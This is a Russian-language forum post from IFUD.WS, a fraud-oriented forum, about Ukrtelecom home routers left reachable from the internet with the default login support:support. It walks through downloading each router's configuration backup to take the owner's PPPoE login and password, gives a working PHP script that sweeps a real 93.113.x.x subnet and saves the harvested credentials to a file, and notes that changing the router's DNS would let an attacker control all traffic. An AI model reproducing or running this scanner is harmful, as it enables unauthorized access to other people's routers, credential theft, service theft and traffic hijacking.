1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Роутеры от Укртелекома за 1 грн

Тема в разделе "Халява | Раздачи", создана пользователем adioss, 19 фев 2013.

  1. TopicStarter Overlay
    adioss

    adioss

    Регистрация:
    22 авг 2012
    Сообщения:
    294
    Симпатии:
    294
    Слыхали об роутерах от Укртелекома за 1 гривну? Тогда мы идём к вам!

    Бувально пару часов назад я заметил, что роутеры Укртелекома доступны из сети и при заходе по их ip доступна панель управления роутером и telnet.
    [​IMG]
    Первой мыслью было одно — найти стандартный пароль для таких роутеров.
    После минутного поиска цель была достигнута, логин: пароль — support:support.
    Ввожу данные в форму и, как не странно, открывается web-панель управления:[​IMG]
    Дальнейшее действие — получить данные от PPPoE соединения: переходим в «Management» -> «Settings» -> «Backup» -> нажимаем «Backup settings». После этих действий в ваших руках оказывается XML-файл, в котором содержатся все настройки роутера, в ком числе логин и пароль от PPPoE.

    Но на этом плюшки не заканчиваются! Следующая мысль — написать сканер подсети.
    Пример кода ниже:

    Код:
    <?php
     
    set_time_limit(0);
     
    $access = 'support:support'; // логин:пароль
     
    $one = '93.113'; // начало подсети (без точки)
     
     
     
    function backup($ip, $access)
     
    {
     
        $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://'.$ip.'/backupsettings.conf');
     
        curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
     
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
     
        // curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 1);
     
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 200);
     
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
     
        curl_setopt($curl, CURLOPT_USERPWD, $access);
     
        $buffer = curl_exec($curl); curl_close($curl);
     
        if(!empty($buffer))
     
        {
     
            return simplexml_load_string($buffer)->InternetGatewayDevice->WANDevice->WANConnectionDevice->WANPPPConnection;
     
        }
     
        else return false;
     
    }
     
     
     
    for($a = 1; $a < 256; $a++){ // генерация цифер после второй точки
     
        for($b = 1; $b < 256; $b++){ // генерация цифер после третьей точки
     
            $file = backup($one.'.'.$a.'.'.$b, $access); // запрос к роутеру
     
            if($file)
     
            {
     
                $save = fopen('login.txt', 'a+');
     
                fwrite($save, $file->Username.':'.$file->Password."\n"); // запись в файл
     
                fclose($save);
     
            }
     
        }
     
    }
     
    ?>
    Вот и всё, за интернет можно не платить. В роутере можно указывать свои DNS сервера, после чего злоумышленник получит контроль над всем трафиком.©
     
    Метки:

Поделиться этой страницей

Загрузка...